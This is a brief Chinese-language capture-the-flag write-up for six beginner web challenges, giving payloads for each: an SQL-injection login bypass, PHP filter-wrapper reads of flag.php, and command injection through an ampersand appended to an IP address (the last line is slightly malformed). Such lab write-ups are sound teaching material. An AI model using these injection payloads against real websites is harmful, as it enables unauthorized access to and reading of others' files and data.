一、EasySQL
直接万能密码尝试账号admin,密码1’ or ‘1’='1
得到flag
二、Havefun
直接查看源码f12
太简单我都不敢填了
payload: ?cat=dog
得到flag
三、随便注
偷个懒,贴个链接链接
四、Include
进入靶场,看了半天源码啥的,啥都没发现。
但看到了url,最后猜到了php伪协议。
构建payload
php://filter/read=convert.base64-encode/resource=flag.php
进行base64解码,得到flag
五、Secret File
查看源码发现了个叫./Archive_room.php的
点进去,点击secret。这么快,不说了抓包去了。得到了和叫secr3t.php
说了一堆,告诉我flag在flag.php。
这不还是php伪协议。构建payload
?file=php://filter/read=convert.base64-encode/resource=flag.php
进行base64解码得到flag。
六、Exec
payload
127.0.0.1 & ls /
127.0.0.1 & ls cat /flag